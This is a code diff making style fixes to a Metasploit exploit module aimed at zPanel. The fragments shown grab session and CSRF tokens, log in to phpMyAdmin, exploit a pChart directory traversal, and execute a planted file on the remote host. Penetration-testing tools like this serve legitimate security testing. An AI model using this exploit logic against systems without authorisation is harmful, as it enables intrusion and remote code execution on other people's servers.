@@ -46,10 +46,9 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'http://pastebin.com/y5Pf4Yms' ]
         ],
         'Payload' => {
-          'BadChars' => "\x00",
+          'BadChars' => "\x00"
         },
         'Platform' => 'php',
-        'Arch' => ARCH_PHP,
         'Targets' => [
           [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
           [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
@@ -127,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Attempting to get PHPSESSIONID')
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri("#{uri}"),
+      'uri' => normalize_uri("#{uri}")
     })
 
     unless res
@@ -139,7 +138,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if sid.length > 0
       print_good('PHPSESSID identified!')
-      print_good("PHPSESSID = #{sid.split("=")[1]}")
+      print_good("PHPSESSID = #{sid.split('=')[1]}")
 
       print_status('Attempting to get CSRF token')
       res = send_request_cgi({
@@ -170,7 +169,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  def login_phpmyadmin(uri, uname, passwd, cookies, token, sess_id)
+  def login_phpmyadmin(_uri, uname, passwd, cookies, token, sess_id)
     old_cookies = cookies
 
     res = send_request_cgi({
@@ -180,7 +179,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'ctype' => 'application/x-www-form-urlencoded',
       'headers' =>
         {
-          'Referer' => "http://#{datastore['RHOST']}/etc/apps/phpmyadmin/",
+          'Referer' => "http://#{datastore['RHOST']}/etc/apps/phpmyadmin/"
         },
       'vars_post' => {
         'pma_username' => uname,
@@ -194,8 +193,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     cookies = "#{res.get_cookies}"
 
-    old_cookies = old_cookies.split("; ")
-    cookies = cookies.split("; ")
+    old_cookies = old_cookies.split('; ')
+    cookies = cookies.split('; ')
 
     new_cookies = "#{old_cookies[0]}; "
     new_cookies << "#{old_cookies[1]}; "
@@ -264,12 +263,12 @@ class MetasploitModule < Msf::Exploit::Remote
       print_good("A privilege escalation exploit can be found 'exploits/linux/local/zpanel_zsudo'")
       print_status("Executing '#{fname}' on the remote host")
 
-      res = send_request_cgi({
+      send_request_cgi({
         'method' => 'GET',
         'uri' => normalize_uri("#{uri}", "#{fname}")
       })
     else
-      print_error("#{res.body.to_s}")
+      print_error("#{res.body}")
     end
   end
 
@@ -297,7 +296,7 @@ class MetasploitModule < Msf::Exploit::Remote
         print_error('It appears that the directory traversal was unsuccessful...')
       end
     else
-      print_error("It appears that the version of pChart is not vulnerable...")
+      print_error('It appears that the version of pChart is not vulnerable...')
     end
   end
 end
